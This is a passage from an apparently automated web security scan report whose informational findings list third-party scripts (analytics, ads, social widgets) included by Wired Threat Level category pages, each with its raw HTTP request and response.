...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.131. http://www.wired.com/threatlevel/category/chaos-computer-club/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/chaos-computer-club/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/chaos-computer-club/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:07:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=246
Expires: Wed, 12 Jan 2011 15:32:53 GMT
Date: Wed, 12 Jan 2011 15:28:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.132. http://www.wired.com/threatlevel/category/conferences/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/conferences/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/conferences/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=272
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:28:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.133. http://www.wired.com/threatlevel/category/copyrights-and-patents/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/copyrights-and-patents/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/copyrights-and-patents/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=278
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.134. http://www.wired.com/threatlevel/category/coverups/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/coverups/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/coverups/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:27 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=246
Expires: Wed, 12 Jan 2011 15:33:07 GMT
Date: Wed, 12 Jan 2011 15:29:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.135. http://www.wired.com/threatlevel/category/crime/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/crime/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/crime/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=223
Expires: Wed, 12 Jan 2011 15:32:55 GMT
Date: Wed, 12 Jan 2011 15:29:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.136. http://www.wired.com/threatlevel/category/crypto/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/crypto/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/crypto/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:43 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=266
Expires: Wed, 12 Jan 2011 15:33:41 GMT
Date: Wed, 12 Jan 2011 15:29:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.137. http://www.wired.com/threatlevel/category/cybarmageddon/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/cybarmageddon/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/cybarmageddon/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 13:59:28 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=303
Expires: Wed, 12 Jan 2011 15:34:26 GMT
Date: Wed, 12 Jan 2011 15:29:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.138. http://www.wired.com/threatlevel/category/cyber-warfare/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/cyber-warfare/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/cyber-warfare/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:56 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=272
Expires: Wed, 12 Jan 2011 15:34:02 GMT
Date: Wed, 12 Jan 2011 15:29:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.139. http://www.wired.com/threatlevel/category/cyberbullying/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/cyberbullying/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/cyberbullying/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:15 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=223
Expires: Wed, 12 Jan 2011 15:33:22 GMT
Date: Wed, 12 Jan 2011 15:29:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.140. http://www.wired.com/threatlevel/category/cybersecurity/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/cybersecurity/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/cybersecurity/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:24 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=170
Expires: Wed, 12 Jan 2011 15:32:31 GMT
Date: Wed, 12 Jan 2011 15:29:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.141. http://www.wired.com/threatlevel/category/defcon/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/defcon/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/defcon/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.142. http://www.wired.com/threatlevel/category/digital-millennium-copyright-act/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/digital-millennium-copyright-act/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/digital-millennium-copyright-act/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:44 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=283
Expires: Wed, 12 Jan 2011 15:34:30 GMT
Date: Wed, 12 Jan 2011 15:29:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.143. http://www.wired.com/threatlevel/category/e-voting/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/e-voting/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/e-voting/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:53 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=215
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:29:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.144. http://www.wired.com/threatlevel/category/elections/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
